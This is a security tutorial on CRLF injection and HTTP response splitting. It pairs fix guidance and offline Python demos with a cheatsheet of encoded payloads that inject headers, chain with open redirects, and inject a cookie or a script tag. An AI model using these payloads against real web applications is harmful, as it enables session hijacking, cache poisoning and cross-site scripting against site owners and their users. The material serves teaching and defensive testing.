CRLF stands for CR (Carriage Return, 0x0D) and LF (Line Feed, 0x0A).
CRLF Injection is one of the web injection attack classes: the attacker gets a CRLF sequence into an HTTP response that the application builds from user input.
The two characters mark the termination of a line, but today's popular operating systems treat them differently.
On Windows both a CR and an LF are required to mark the end of a line, whereas on Linux/UNIX only an LF is required. In the HTTP protocol the CR-LF sequence is always used to terminate a line: every header line ends with it, and an empty line (CR-LF CR-LF) separates the headers from the body.
By injecting CRLF sequences, attackers can modify the application's response data, compromising its integrity and enabling the exploitation of other vulnerabilities such as Cross-Site Scripting (XSS), web page injection, web server cache poisoning, website defacement and more.
A CRLF Injection attack occurs when a user manages to submit a CRLF sequence into an application that copies it into a response header. This is most commonly done by modifying an HTTP parameter or the URL, with the sequence percent-encoded as %0d%0a.
How To Fix?
- Never concatenate raw user input into an HTTP header; always pass it through a function that neutralises the CR and LF special characters.
- Strip any newline characters (CR and LF) before passing content into an HTTP header.
- Alternatively, encode the data you pass into HTTP headers (for example, percent-encode CR and LF as %0D and %0A). This keeps the CR and LF codes inside the header value if the attacker attempts to inject them, so they can no longer terminate the line.
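The following is an added example, not code from the original page: a redirect handler that copies a user-controlled query parameter into the Location header. build_redirect_unsafe() reproduces the injection, build_redirect_safe() applies the two fixes above (strip or encode), and parse_response() splits the raw response the way a browser or proxy would, so the effect of each version is visible. The HTTP framing is assembled as a plain string so it runs offline; the parameter name, the URL path and the two payloads are assumptions made for illustration.

```python
"""Added example (not from the original page): a redirect handler that
copies a user-controlled 'next' parameter into the Location header.
build_redirect_unsafe() shows the CRLF injection; build_redirect_safe()
applies the two fixes listed above (strip, or encode). The HTTP framing
is built as a plain string so the example runs offline; the parameter
name, the path and the payloads are assumptions for illustration."""
from urllib.parse import unquote

CRLF = "\r\n"


def _frame(location: str) -> str:
    """Assemble a minimal 302 response around the given Location value."""
    return (
        "HTTP/1.1 302 Found" + CRLF
        + "Location: " + location + CRLF
        + "Content-Length: 0" + CRLF
        + CRLF
    )


def build_redirect_unsafe(next_param: str) -> str:
    """Vulnerable: the percent-decoded query value lands in the header as-is."""
    return _frame(unquote(next_param))


def strip_newlines(value: str) -> str:
    """Fix 1: remove CR and LF before the value reaches a header."""
    return value.replace("\r", "").replace("\n", "")


def encode_newlines(value: str) -> str:
    """Fix 2: percent-encode CR and LF so they stay inside the header value."""
    return value.replace("\r", "%0D").replace("\n", "%0A")


def build_redirect_safe(next_param: str, mode: str = "encode") -> str:
    """Hardened: neutralise CR/LF with one of the two fixes before framing."""
    target = unquote(next_param)
    clean = encode_newlines(target) if mode == "encode" else strip_newlines(target)
    return _frame(clean)


def parse_response(raw: str) -> dict:
    """Split a raw response the way a browser or proxy does: the header
    block ends at the first blank line; each header is 'Name: value'."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"status": lines[0], "headers": headers, "body": body}


# Constructed payloads: the first injects a second header (a cookie the
# attacker chose), the second injects a blank line and a body (response
# splitting that leads to XSS).
COOKIE_PAYLOAD = "/dashboard%0d%0aSet-Cookie:%20session=attacker"
XSS_PAYLOAD = "/dashboard%0d%0a%0d%0a<script>alert(1)</script>"


def demo() -> dict:
    """Return what a client would see for each payload, unsafe vs. safe."""
    return {
        "unsafe_cookie": parse_response(build_redirect_unsafe(COOKIE_PAYLOAD)),
        "safe_cookie": parse_response(build_redirect_safe(COOKIE_PAYLOAD)),
        "unsafe_xss": parse_response(build_redirect_unsafe(XSS_PAYLOAD)),
        "safe_xss": parse_response(build_redirect_safe(XSS_PAYLOAD, mode="strip")),
    }


if __name__ == "__main__":
    for name, seen in demo().items():
        print(name, seen["headers"], repr(seen["body"][:40]))
```

In the unsafe build the injected Set-Cookie line is parsed as a real header and the second payload's script tag becomes the response body; after either fix the whole value stays on the Location line and the body is empty. Encoding keeps the attacker's bytes visible in the value, stripping silently joins the pieces; both stop the line break, and many modern frameworks reject CR/LF in header values outright, which is the same control applied at the library level.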
CRLF Injection Cheatsheet
CRLF Injection || HTTP Response Splitting
Header-based test, site root
%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header
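As an added example (not part of the original cheatsheet), the script below runs the header-based payloads above through repeated percent-decoding and reports how many decode passes each needs before a raw CR or LF appears. Servers, proxies and frameworks differ in how many times they decode a URL, which is why the list carries single-, double- and triple-encoded variants of the same line break. The payload strings are copied from the list above; the classification logic is this example's own, and it uses Python's standard unquote() as a stand-in for a server's decoder.

```python
"""Added example (not from the original page): classify the header-based
cheatsheet payloads by how many percent-decoding passes it takes until a
raw CR or LF appears. Python's urllib.parse.unquote() stands in for the
target's decoder; real servers may decode more or fewer times."""
from urllib.parse import unquote

# Copied from the cheatsheet list above.
PAYLOADS = [
    "%0d%0aheader:header",
    "%0aheader:header",
    "%0dheader:header",
    "%23%0dheader:header",
    "%3f%0dheader:header",
    "/%250aheader:header",
    "/%25250aheader:header",
    "/%%0a0aheader:header",
    "/%3f%0dheader:header",
    "/%23%0dheader:header",
    "/%25%30aheader:header",
    "/%25%30%61header:header",
    "/%u000aheader:header",
]


def decode_passes_until_crlf(payload: str, max_passes: int = 3):
    """Return the number of unquote() passes after which the value holds a
    raw CR or LF, or None if max_passes passes never produce one."""
    value = payload
    for passes in range(1, max_passes + 1):
        value = unquote(value)
        if "\r" in value or "\n" in value:
            return passes
    return None


def classify(payloads=PAYLOADS) -> dict:
    """Map each payload to the decode depth at which it becomes a line break."""
    return {p: decode_passes_until_crlf(p) for p in payloads}


if __name__ == "__main__":
    for payload, passes in classify().items():
        label = f"{passes} decode pass(es)" if passes else "no CR/LF after 3 passes"
        print(f"{payload:32} -> {label}")
```

The %23 and %3f variants decode to a '#' or '?' followed by the CR, which matters where the server treats the fragment or query boundary differently from the path. The %25-prefixed variants only become a line break on the second or third pass, so they target stacks that decode twice (for example a proxy and then the application). The /%%0a0a form relies on the decoder tolerating a stray '%', and the /%u000a form is not standard percent-encoding at all: standard decoders leave it alone, and it only works against servers that additionally accept the non-standard %uXXXX form.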
CRLF chained with Open Redirect server misconfiguration
Note: This sometimes works. (Found on some Yandex sites; it was not exploitable from the site root.)
//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header
CRLF Injection to XSS
Response splitting on a 302 redirect, injected before the Location header (discovered in DoD)
Response splitting on a 301 response, chained with an open redirect to corrupt the Location header and break the 301, by @black2fan (Facebook bug)
Note: xxx:1 was used to break the open redirect destination (the Location header). A great example of how to escalate CRLF to XSS on what would seem to be an unexploitable 301 status code.
Source: Owasp, GitHub